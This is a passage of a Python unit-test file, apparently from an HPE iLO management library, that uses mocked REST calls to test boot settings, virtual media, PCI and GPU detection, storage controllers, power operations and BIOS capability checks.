    get_mock.assert_called_once_with(member_uri)
def test__get_vm_device_status_invalid_device(self):
    """An unrecognized device name raises IloInvalidInputError."""
    self.assertRaises(exception.IloInvalidInputError,
                      self.client._get_vm_device_status, device='FOO')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test__get_vm_device_status_vmedia_not_supported(self,
                                                    ilo_details_mock):
    """Manager data without a VirtualMedia link raises not-supported."""
    manager_uri = '/rest/v1/Managers/1'
    manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS_NO_VMEDIA)
    ilo_details_mock.return_value = (manager_data, manager_uri)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_vm_device_status, device='FLOPPY')
    ilo_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test__get_vm_device_status_fail(self,
                                    collection_mock,
                                    ilo_details_mock,
                                    get_mock):
    """Non-200 status on the vmedia member GET raises IloError."""
    manager_uri = '/rest/v1/Managers/1'
    manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    ilo_details_mock.return_value = (manager_data, manager_uri)
    collection_item = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_EMPTY)
    vmedia_uri = '/rest/v1/Managers/1/VirtualMedia'
    member_uri = '/rest/v1/Managers/1/VirtualMedia/1'
    collection_mock.return_value = [(200, None, collection_item,
                                     member_uri)]
    get_mock.return_value = (301, ris_outputs.GET_HEADERS,
                             ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError,
                      self.client._get_vm_device_status, device='FLOPPY')
    ilo_details_mock.assert_called_once_with()
    collection_mock.assert_called_once_with(vmedia_uri)
    get_mock.assert_called_once_with(member_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test__get_vm_device_status_device_missing(self,
                                              collection_mock,
                                              ilo_details_mock,
                                              get_mock):
    """A collection without the requested CDROM device raises IloError."""
    manager_uri = '/rest/v1/Managers/1'
    manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    ilo_details_mock.return_value = (manager_data, manager_uri)
    collection_item = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_MISSING)
    vmedia_uri = '/rest/v1/Managers/1/VirtualMedia'
    member_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    collection_mock.return_value = [(200, None, collection_item,
                                     member_uri)]
    get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                             collection_item)
    self.assertRaises(exception.IloError,
                      self.client._get_vm_device_status, device='CDROM')
    ilo_details_mock.assert_called_once_with()
    collection_mock.assert_called_once_with(vmedia_uri)
    get_mock.assert_called_once_with(member_uri)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_once(self, rest_patch_mock):
    """persistent=False patches BootSourceOverrideEnabled as 'Once'."""
    systems_uri = "/rest/v1/Systems/1"
    new_boot_settings = {}
    new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Once',
                                 'BootSourceOverrideTarget': 'Cd'}
    rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                    ris_outputs.REST_POST_RESPONSE)
    self.client._update_persistent_boot(['cdrom'], persistent=False)
    rest_patch_mock.assert_called_once_with(systems_uri, None,
                                            new_boot_settings)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_continuous(self, rest_patch_mock):
    """persistent=True patches BootSourceOverrideEnabled as 'Continuous'."""
    systems_uri = "/rest/v1/Systems/1"
    new_boot_settings = {}
    new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Continuous',
                                 'BootSourceOverrideTarget': 'Cd'}
    rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                    ris_outputs.REST_POST_RESPONSE)
    self.client._update_persistent_boot(['cdrom'], persistent=True)
    rest_patch_mock.assert_called_once_with(systems_uri, None,
                                            new_boot_settings)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_UefiShell(self, rest_patch_mock):
    """'UefiShell' device maps straight to the UefiShell override target."""
    systems_uri = "/rest/v1/Systems/1"
    new_boot_settings = {}
    new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Continuous',
                                 'BootSourceOverrideTarget': 'UefiShell'}
    rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                    ris_outputs.REST_POST_RESPONSE)
    self.client._update_persistent_boot(['UefiShell'],
                                        persistent=True)
    rest_patch_mock.assert_called_once_with(systems_uri, None,
                                            new_boot_settings)
@mock.patch.object(ris.RISOperations, '_get_host_details')
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_iscsi(self, rest_patch_mock,
                                           get_host_mock):
    """ISCSI boot issues two patches: UEFI target id, then override mode."""
    get_host_mock.return_value = (
        json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI))
    systems_uri = '/rest/v1/Systems/1'
    new1_boot_settings = {}
    new1_boot_settings['Boot'] = {'UefiTargetBootSourceOverride':
                                  u'NIC.LOM.1.1.iSCSI'}
    new2_boot_settings = {}
    new2_boot_settings['Boot'] = {'BootSourceOverrideEnabled':
                                  'Continuous', 'BootSourceOverrideTarget':
                                  'UefiTarget'}
    rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                    ris_outputs.REST_POST_RESPONSE)
    # Order matters: the UEFI target must be set before the override mode.
    calls = [mock.call(systems_uri, None, new1_boot_settings),
             mock.call(systems_uri, None, new2_boot_settings)]
    self.client._update_persistent_boot(['ISCSI'], persistent=True)
    rest_patch_mock.assert_has_calls(calls)
@mock.patch.object(ris.RISOperations, '_get_host_details')
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_iscsi_with_none_device_present(
        self, rest_patch_mock, get_host_mock):
    """ISCSI boot still works when a 'None' device is present in host data."""
    get_host_mock.return_value = (
        json.loads(
            ris_outputs.RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI_AND_NONE))
    systems_uri = '/rest/v1/Systems/1'
    new1_boot_settings = {}
    new1_boot_settings['Boot'] = {'UefiTargetBootSourceOverride':
                                  u'NIC.LOM.1.1.iSCSI'}
    new2_boot_settings = {}
    new2_boot_settings['Boot'] = {'BootSourceOverrideEnabled':
                                  'Continuous', 'BootSourceOverrideTarget':
                                  'UefiTarget'}
    rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                    ris_outputs.REST_POST_RESPONSE)
    calls = [mock.call(systems_uri, None, new1_boot_settings),
             mock.call(systems_uri, None, new2_boot_settings)]
    self.client._update_persistent_boot(['ISCSI'], persistent=True)
    rest_patch_mock.assert_has_calls(calls)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__update_persistent_boot_for_iscsi_not_found(self,
                                                     get_host_mock):
    """No UEFI iSCSI bootable device in host data raises IloError."""
    get_host_mock.return_value = (
        json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP))
    self.assertRaisesRegex(exception.IloError, "No UEFI iSCSI bootable "
                           "device found",
                           self.client._update_persistent_boot,
                           ['ISCSI'], persistent=True)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_fail(self, rest_patch_mock):
    """Non-200 status on the boot-settings patch raises IloError."""
    systems_uri = "/rest/v1/Systems/1"
    new_boot_settings = {}
    new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Continuous',
                                 'BootSourceOverrideTarget': 'FakeDevice'}
    rest_patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                                    ris_outputs.REST_POST_RESPONSE)
    self.assertRaises(exception.IloError,
                      self.client._update_persistent_boot,
                      ['FakeDevice'], persistent=True)
    rest_patch_mock.assert_called_once_with(systems_uri, None,
                                            new_boot_settings)
@mock.patch.object(ris.RISOperations, '_get_bios_boot_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_persistent_boot_devices_no_boot_order(self,
                                                    check_bios_mock,
                                                    boot_mock):
    """Boot data without PersistentBootConfigOrder raises IloError."""
    bios_uri = '/rest/v1/systems/1/bios'
    bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                    bios_uri, bios_settings)
    boot_settings = json.loads(ris_outputs.BOOT_PERS_DEV_ORDER_MISSING)
    boot_mock.return_value = boot_settings
    self.assertRaises(exception.IloError,
                      self.client._get_persistent_boot_devices)
    check_bios_mock.assert_called_once_with()
    boot_mock.assert_called_once_with(bios_settings)
@mock.patch.object(ris.RISOperations, '_get_bios_boot_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_persistent_boot_devices(self, check_bios_mock, boot_mock):
    """Happy path: returns the (boot sources, boot order) pair."""
    bios_uri = '/rest/v1/systems/1/bios'
    bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                    bios_uri, bios_settings)
    boot_settings = json.loads(ris_outputs.GET_BIOS_BOOT)
    boot_mock.return_value = boot_settings
    exp_boot_src = json.loads(ris_outputs.UEFI_BootSources)
    exp_boot_order = ris_outputs.UEFI_PERS_BOOT_DEVICES
    boot_src, boot_order = self.client._get_persistent_boot_devices()
    check_bios_mock.assert_called_once_with()
    boot_mock.assert_called_once_with(bios_settings)
    self.assertEqual(boot_src, exp_boot_src)
    self.assertEqual(boot_order, exp_boot_order)
@mock.patch.object(ris.RISOperations, '_get_bios_boot_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_persistent_boot_devices_no_bootsources(self,
                                                     check_bios_mock,
                                                     boot_mock):
    """Boot data without BootSources raises IloError."""
    bios_uri = '/rest/v1/systems/1/bios'
    bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                    bios_uri, bios_settings)
    boot_settings = json.loads(ris_outputs.UEFI_BOOTSOURCES_MISSING)
    boot_mock.return_value = boot_settings
    self.assertRaises(exception.IloError,
                      self.client._get_persistent_boot_devices)
    check_bios_mock.assert_called_once_with()
    boot_mock.assert_called_once_with(bios_settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_pci_devices(self, get_host_details_mock, get_mock):
    """PCI device list is fetched from the PCIDevices link."""
    system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_host_details_mock.return_value = system_data
    pci_uri = '/rest/v1/Systems/1/PCIDevices'
    pci_device_list = json.loads(ris_outputs.PCI_DEVICE_DETAILS)
    get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                             pci_device_list)
    self.client._get_pci_devices()
    get_mock.assert_called_once_with(pci_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_pci_devices_fail(self, get_host_details_mock,
                               get_mock):
    """Non-200 status from the PCIDevices URI raises IloError."""
    system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_host_details_mock.return_value = system_data
    pci_uri = '/rest/v1/Systems/1/PCIDevices'
    pci_device_list = json.loads(ris_outputs.PCI_DEVICE_DETAILS)
    get_mock.return_value = (301, ris_outputs.GET_HEADERS,
                             pci_device_list)
    self.assertRaises(exception.IloError,
                      self.client._get_pci_devices)
    get_mock.assert_called_once_with(pci_uri)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_pci_devices_not_supported(self, get_details_mock):
    """Host data without the PCIDevices link raises not-supported."""
    host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    # Simulate older hardware/firmware by removing the link.
    del host_response['Oem']['Hp']['links']['PCIDevices']
    get_details_mock.return_value = host_response
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_pci_devices)
    get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_storage_resource(self, get_host_details_mock, get_mock):
    """SmartStorage resource is fetched from its link in host details."""
    system_data = json.loads(ris_outputs.REST_GET_SMART_STORAGE)
    get_host_details_mock.return_value = system_data
    storage_uri = '/rest/v1/Systems/1/SmartStorage'
    storage_settings = json.loads(ris_outputs.STORAGE_SETTINGS)
    get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                             storage_settings)
    self.client._get_storage_resource()
    get_mock.assert_called_once_with(storage_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_storage_resource_fail(self, get_host_details_mock,
                                    get_mock):
    """Non-200 status from the SmartStorage URI raises IloError."""
    system_data = json.loads(ris_outputs.REST_GET_SMART_STORAGE)
    get_host_details_mock.return_value = system_data
    storage_uri = '/rest/v1/Systems/1/SmartStorage'
    storage_settings = json.loads(ris_outputs.STORAGE_SETTINGS)
    get_mock.return_value = (301, ris_outputs.GET_HEADERS,
                             storage_settings)
    self.assertRaises(exception.IloError,
                      self.client._get_storage_resource)
    get_mock.assert_called_once_with(storage_uri)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_storage_resource_not_supported(self,
                                             get_host_details_mock):
    """Host data without the SmartStorage link raises not-supported."""
    system_data = json.loads(ris_outputs.REST_GET_SMART_STORAGE)
    # Simulate a system with no smart-storage support.
    del system_data['Oem']['Hp']['links']['SmartStorage']
    get_host_details_mock.return_value = system_data
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_storage_resource)
    get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_storage_resource')
def test__get_array_controller_resource(self, storage_mock, get_mock):
    """ArrayControllers resource is fetched via the storage resource."""
    storage_data = json.loads(ris_outputs.STORAGE_SETTINGS)
    storage_uri = '/rest/v1/Systems/1/SmartStorage'
    storage_mock.return_value = (ris_outputs.GET_HEADERS,
                                 storage_uri,
                                 storage_data)
    array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
    array_settings = json.loads(ris_outputs.ARRAY_SETTINGS)
    get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                             array_settings)
    self.client._get_array_controller_resource()
    get_mock.assert_called_once_with(array_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_storage_resource')
def test__get_array_controller_resource_fail(self, storage_mock,
                                             get_mock):
    """Non-200 status from the ArrayControllers URI raises IloError."""
    storage_data = json.loads(ris_outputs.STORAGE_SETTINGS)
    storage_uri = '/rest/v1/Systems/1/SmartStorage'
    storage_mock.return_value = (ris_outputs.GET_HEADERS,
                                 storage_uri,
                                 storage_data)
    array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
    array_settings = json.loads(ris_outputs.ARRAY_SETTINGS)
    get_mock.return_value = (301, ris_outputs.GET_HEADERS,
                             array_settings)
    self.assertRaises(exception.IloError,
                      self.client._get_array_controller_resource)
    get_mock.assert_called_once_with(array_uri)
@mock.patch.object(ris.RISOperations, '_get_storage_resource')
def test__get_array_controller_resource_not_supported(self,
                                                      storage_mock):
    """Storage data without the ArrayControllers link raises not-supported."""
    storage_data = json.loads(ris_outputs.STORAGE_SETTINGS)
    storage_uri = '/rest/v1/Systems/1/SmartStorage'
    del storage_data['links']['ArrayControllers']
    storage_mock.return_value = (ris_outputs.GET_HEADERS,
                                 storage_uri,
                                 storage_data)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_array_controller_resource)
    storage_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__create_list_of_array_controllers(self, array_mock):
    """Member hrefs of the array-controller collection are returned."""
    array_data = json.loads(ris_outputs.ARRAY_SETTINGS)
    array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
    array_mock.return_value = (ris_outputs.GET_HEADERS,
                               array_uri,
                               array_data)
    expected_uri_links = (
        [{u'href': u'/rest/v1/Systems/1/SmartStorage/ArrayControllers/0'}])
    uri_links = self.client._create_list_of_array_controllers()
    self.assertEqual(expected_uri_links, uri_links)
    array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__create_list_of_array_controllers_fail(self, array_mock):
    """Collection without a Member link raises not-supported."""
    array_data = json.loads(ris_outputs.ARRAY_SETTINGS)
    array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
    del array_data['links']['Member']
    array_mock.return_value = (ris_outputs.GET_HEADERS,
                               array_uri,
                               array_data)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._create_list_of_array_controllers)
    array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_physical_drive_resource')
def test__get_drive_type_and_speed(self, disk_details_mock):
    """Physical-drive details map to rotational type/speed capabilities."""
    disk_details_mock.return_value = (
        json.loads(ris_outputs.DISK_DETAILS_LIST))
    expected_out = {'has_rotational': 'true',
                    'rotational_drive_10000_rpm': 'true'}
    out = self.client._get_drive_type_and_speed()
    self.assertEqual(expected_out, out)
    disk_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_create_list_of_array_controllers')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_drive_resource_physical(self, get_mock, array_mock):
    """Physical drives: controller -> disk collection -> disk details."""
    array_mock.return_value = (
        [{u'href': u'/rest/v1/Systems/1/SmartStorage/ArrayControllers/0'}])
    # Three sequential GETs: controller member, disk collection, details.
    get_mock.side_effect = [(ris_outputs.GET_HEADERS, 'xyz',
                             json.loads(ris_outputs.ARRAY_MEM_SETTINGS)),
                            (ris_outputs.GET_HEADERS, 'xyz',
                             json.loads(ris_outputs.DISK_COLLECTION)),
                            (ris_outputs.GET_HEADERS, 'xyz',
                             json.loads(ris_outputs.DISK_DETAILS_LIST))]
    out = self.client._get_physical_drive_resource()
    expected_out = []
    expected_out.append(json.loads(ris_outputs.DISK_DETAILS_LIST))
    self.assertEqual(expected_out, out)
    array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_create_list_of_array_controllers')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_drive_resource_logical(self, get_mock, array_mock):
    """Logical drives: controller -> logical collection -> drive details."""
    array_mock.return_value = (
        [{u'href': u'/rest/v1/Systems/1/SmartStorage/ArrayControllers/0'}])
    # Three sequential GETs: controller member, logical collection, details.
    get_mock.side_effect = [(ris_outputs.GET_HEADERS, 'xyz',
                             json.loads(ris_outputs.ARRAY_MEM_SETTINGS)),
                            (ris_outputs.GET_HEADERS, 'xyz',
                             json.loads(ris_outputs.LOGICAL_COLLECTION)),
                            (ris_outputs.GET_HEADERS, 'xyz',
                             json.loads(ris_outputs.LOGICAL_DETAILS))]
    out = self.client._get_logical_drive_resource()
    expected_out = []
    expected_out.append(json.loads(ris_outputs.LOGICAL_DETAILS))
    self.assertEqual(expected_out, out)
    array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_pci_devices')
def test__get_gpu_pci_devices(self, pci_mock):
    """GPU devices are filtered out of the full PCI device list."""
    pci_mock.return_value = json.loads(ris_outputs.PCI_DEVICE_DETAILS)
    pci_gpu_list = self.client._get_gpu_pci_devices()
    self.assertEqual(pci_gpu_list, json.loads(ris_outputs.PCI_GPU_LIST))
    self.assertTrue(pci_mock.called)
@mock.patch.object(ris.RISOperations, '_get_pci_devices')
def test__get_gpu_pci_devices_returns_empty(self, pci_mock):
    """No GPU entries in the PCI list yields an empty result."""
    pci_response = json.loads(ris_outputs.PCI_DEVICE_DETAILS_NO_GPU)
    pci_mock.return_value = pci_response
    pci_gpu_list = self.client._get_gpu_pci_devices()
    self.assertEqual(len(pci_gpu_list), 0)
    self.assertTrue(pci_mock.called)
@mock.patch.object(ris.RISOperations, '_get_pci_devices')
def test__get_gpu_pci_devices_fail_not_supported_error(self, pci_mock):
    """Not-supported from the PCI lookup propagates unchanged."""
    msg = ('links/PCIDevices section in ComputerSystem/Oem/Hp'
           ' does not exist')
    pci_mock.side_effect = exception.IloCommandNotSupportedError(msg)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_gpu_pci_devices)
    self.assertTrue(pci_mock.called)
@mock.patch.object(ris.RISOperations, '_get_gpu_pci_devices')
def test__get_number_of_gpu_devices_connected(self, gpu_list_mock):
    """GPU count is reported as {'pci_gpu_devices': <n>}."""
    gpu_list_mock.return_value = json.loads(ris_outputs.PCI_GPU_LIST)
    expected_gpu_count = {'pci_gpu_devices': 1}
    gpu_count_returned = self.client._get_number_of_gpu_devices_connected()
    self.assertEqual(gpu_count_returned, expected_gpu_count)
    self.assertTrue(gpu_list_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_cpu_virtualization_enabled(self, bios_mock):
    """Enabled ProcVirtualization BIOS setting maps to True."""
    bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    bios_mock.return_value = bios_settings['ProcVirtualization']
    expected_cpu_vt = True
    cpu_vt_return = self.client._get_cpu_virtualization()
    self.assertEqual(cpu_vt_return, expected_cpu_vt)
    self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_cpu_virtualization_disabled(self, bios_mock):
    """'Disable' ProcVirtualization setting maps to False."""
    bios_mock.return_value = 'Disable'
    expected_cpu_vt = False
    cpu_vt_return = self.client._get_cpu_virtualization()
    self.assertEqual(cpu_vt_return, expected_cpu_vt)
    self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_cpu_virtualization_not_supported_error(self, bios_mock):
    """A not-supported BIOS property is treated as VT disabled (False)."""
    msg = ("BIOS Property 'ProcVirtualization' is not supported on this"
           " system")
    bios_mock.side_effect = exception.IloCommandNotSupportedError(msg)
    expected_cpu_vt = False
    cpu_vt_return = self.client._get_cpu_virtualization()
    self.assertEqual(cpu_vt_return, expected_cpu_vt)
    self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_ilo_details', autospec=True)
def test__get_firmware_update_service_resource_traverses_manager_as(
        self, _get_ilo_details_mock):
    """Asserts the exact key path Oem->Hp->links->UpdateService->href.

    A MagicMock stands in for the manager dict so each chained
    __getitem__ call can be verified individually.
    """
    # | GIVEN |
    manager_mock = mock.MagicMock(spec=dict, autospec=True)
    _get_ilo_details_mock.return_value = (manager_mock, 'some_uri')
    # | WHEN |
    self.client._get_firmware_update_service_resource()
    # | THEN |
    manager_mock.__getitem__.assert_called_once_with('Oem')
    manager_mock.__getitem__().__getitem__.assert_called_once_with('Hp')
    (manager_mock.__getitem__().__getitem__().__getitem__.
        assert_called_once_with('links'))
    (manager_mock.__getitem__().__getitem__().__getitem__().
        __getitem__.assert_called_once_with('UpdateService'))
    (manager_mock.__getitem__().__getitem__().__getitem__().
        __getitem__().__getitem__.assert_called_once_with('href'))
@mock.patch.object(ris.RISOperations, '_get_ilo_details', autospec=True)
def test__get_firmware_update_service_resource_throws_if_not_found(
        self, _get_ilo_details_mock):
    """A KeyError while traversing manager data maps to not-supported."""
    # | GIVEN |
    manager_mock = mock.MagicMock(spec=dict)
    _get_ilo_details_mock.return_value = (manager_mock, 'some_uri')
    manager_mock.__getitem__.side_effect = KeyError('not found')
    # | WHEN | & | THEN |
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_firmware_update_service_resource)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_press_pwr_btn(self, rest_post_mock):
    """Pressing the power button POSTs the PowerButton action payload."""
    systems_uri = "/rest/v1/Systems/1"
    new_pow_settings = {"Action": "PowerButton",
                        "Target": "/Oem/Hp",
                        "PushType": "Press"}
    rest_post_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
    self.client._press_pwr_btn()
    rest_post_mock.assert_called_once_with(systems_uri, None,
                                           new_pow_settings)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_press_pwr_btn_patch_fail(self, rest_post_mock):
    """Non-200 status on the PowerButton POST raises IloError."""
    systems_uri = "/rest/v1/Systems/1"
    new_pow_settings = {"Action": "PowerButton",
                        "Target": "/Oem/Hp",
                        "PushType": "Press"}
    rest_post_mock.return_value = (301, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError,
                      self.client._press_pwr_btn, 'Press')
    rest_post_mock.assert_called_once_with(systems_uri, None,
                                           new_pow_settings)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_perform_power_op(self, rest_post_mock):
    """reset_server POSTs a ForceRestart reset action."""
    systems_uri = "/rest/v1/Systems/1"
    new_pow_settings = {"Action": "Reset", "ResetType": "ForceRestart"}
    rest_post_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
    self.client.reset_server()
    rest_post_mock.assert_called_once_with(systems_uri, None,
                                           new_pow_settings)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_perform_power_op_fail(self, rest_post_mock):
    """Non-200 status on the reset POST raises IloError."""
    systems_uri = "/rest/v1/Systems/1"
    new_pow_settings = {"Action": "Reset", "ResetType": "ForceRestart"}
    rest_post_mock.return_value = (301, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError,
                      self.client.reset_server)
    rest_post_mock.assert_called_once_with(systems_uri, None,
                                           new_pow_settings)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_notpresent(self, bios_mock):
    """'NotPresent' TpmState maps to False."""
    bios_mock.return_value = 'NotPresent'
    expected_out = False
    status = self.client._get_tpm_capability()
    self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_presentdisabled(self, bios_mock):
    """'PresentDisabled' TpmState still reports the capability as True."""
    bios_mock.return_value = 'PresentDisabled'
    expected_out = True
    status = self.client._get_tpm_capability()
    self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_presentenabled(self, bios_mock):
    """'PresentEnabled' TpmState maps to True."""
    bios_mock.return_value = 'PresentEnabled'
    expected_out = True
    status = self.client._get_tpm_capability()
    self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_resource_notpresent(self, bios_mock):
    """A not-supported TpmState property maps to False."""
    msg = 'BIOS Property TpmState is not supported on this system.'
    bios_mock.side_effect = exception.IloCommandNotSupportedError(msg)
    expected_out = False
    status = self.client._get_tpm_capability()
    self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_nvdimm_n_status_enabled(self, bios_mock):
    """Enabled NvDimmNMemFunctionality maps to True."""
    bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    bios_mock.return_value = bios_settings['NvDimmNMemFunctionality']
    expected_nvdimm_n_status = True
    nvdimm_n_status_return = self.client._get_nvdimm_n_status()
    self.assertEqual(nvdimm_n_status_return, expected_nvdimm_n_status)
    self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_nvdimm_n_status_disabled(self, bios_mock):
    """'Disabled' NvDimmNMemFunctionality maps to False."""
    bios_mock.return_value = 'Disabled'
    expected_nvdimm_n_status = False
    nvdimm_n_status_return = self.client._get_nvdimm_n_status()
    self.assertEqual(nvdimm_n_status_return, expected_nvdimm_n_status)
    self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_nvdimm_n_status_not_supported_error(self, bios_mock):
    """A not-supported NVDIMM-N property maps to False."""
    msg = ("BIOS Property 'NvDimmNMemFunctionality' is not supported on"
           " this system")
    bios_mock.side_effect = exception.IloCommandNotSupportedError(msg)
    expected_nvdimm_n_status = False
    nvdimm_n_status_return = self.client._get_nvdimm_n_status()
    self.assertEqual(nvdimm_n_status_return, expected_nvdimm_n_status)
    self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__is_raid_supported(self, get_array_mock):
    """A populated array-controller resource reports RAID as supported."""
    array_settings = json.loads(ris_outputs.ARRAY_SETTINGS)
    get_array_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   array_settings)
    expt_ret = True
    ret = self.client._is_raid_supported()
    self.assertEqual(ret, expt_ret)
    get_array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__is_raid_supported_false(self, get_array_mock):
    """No controllers in the array resource reports RAID as unsupported."""
    array_settings = json.loads(ris_outputs.ARRAY_SETTING_NO_CONTROLLER)
    get_array_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   array_settings)
    expt_ret = False
    ret = self.client._is_raid_supported()
    self.assertEqual(ret, expt_ret)
    get_array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, 'get_product_name')
def test_delete_raid_configuration(self, product_name_mock):
    """delete_raid_configuration is unsupported on Gen9 RIS systems.

    The raised error message must name the product, so operators can
    tell which server rejected the operation.
    """
    product_name_mock.return_value = 'ProLiant BL460c Gen9'
    # assertRaisesRegexp is deprecated (removed in Python 3.12);
    # use assertRaisesRegex, consistent with the rest of this file.
    self.assertRaisesRegex(exception.IloCommandNotSupportedError,
                           'ProLiant BL460c Gen9',
                           self.client.delete_raid_configuration)
@mock.patch.object(ris.RISOperations, 'get_product_name')
def test_create_raid_configuration(self, product_name_mock):
